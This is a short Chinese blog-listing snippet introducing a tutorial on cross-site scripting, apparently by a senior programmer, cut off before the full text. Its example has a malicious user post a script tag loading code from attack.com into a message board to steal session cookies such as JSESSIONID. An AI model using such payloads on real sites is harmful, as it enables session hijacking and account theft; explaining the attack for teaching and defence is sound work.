亚亚（资深程序员）

摘要： 一、跨站脚本攻击 XSS 场景：获取用户Cookie，用于伪造登录。如java的JSESSIONID。 例子：有个留言板程序http://test.com/add.jsp, list.jsp （1）恶意用户A留言, 内容<script>http://attack.com/attack.js</scr 阅读全文